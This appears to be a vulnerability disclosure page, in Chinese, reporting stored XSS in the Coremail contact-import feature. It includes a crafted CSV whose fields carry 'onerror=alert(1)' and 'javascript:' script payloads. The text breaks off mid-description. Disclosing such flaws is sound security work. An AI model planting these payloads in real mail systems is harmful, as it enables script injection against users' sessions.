Coremail某功能多处存储型XSS

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 漏洞还是得交乌云。 ### 详细说明: coremail在个人通讯录处可以导入联系人,格式为csv。 [<img src="https://images.seebug.org/upload/201501/06151859d42791e1ad4cf5f545b14e12febd2e5c.jpg" alt="01.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06151859d42791e1ad4cf5f545b14e12febd2e5c.jpg) 导入如下CSV: ``` 联系组,姓名,电子邮件地址,住宅地址,住宅地址 邮政编码,住宅电话,移动电话,单位,商务地址,商务地址 邮政编码,商务电话,商务传真,生日,即时信息地址,网页,__cm_group aa</textarea><img src=1 onerror=alert(1)>aaaaa,</textarea><img src=1 onerror=alert(1)>,</textarea><img src=1 onerror=alert(1)>@qq.com,,,,13132132132,<img src=1 onerror=alert(1)>,<img src=1 onerror=alert(1)>,,<img src=1 onerror=alert(1)>,,19881212,<img src=1 onerror=alert(1)>,javascript:alert(1) ,,,,,,,,,,,,,,,FRIENDS=<img src=1 onerror=alert(1)> ,,,,,,,,,,,,,,,FAMILY=<img src=1 onerror=alert(1)> ,,,,,,,,,,,,,,,COWORKERS=<img src=1 onerror=alert(1)> ,,,,,,,,,,,,,,,NETFRIENDS=网友 ,,,,,,,,,,,,,,,VIP=重要联系人 ``` 可见主页面已经转义了,没有触发: [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息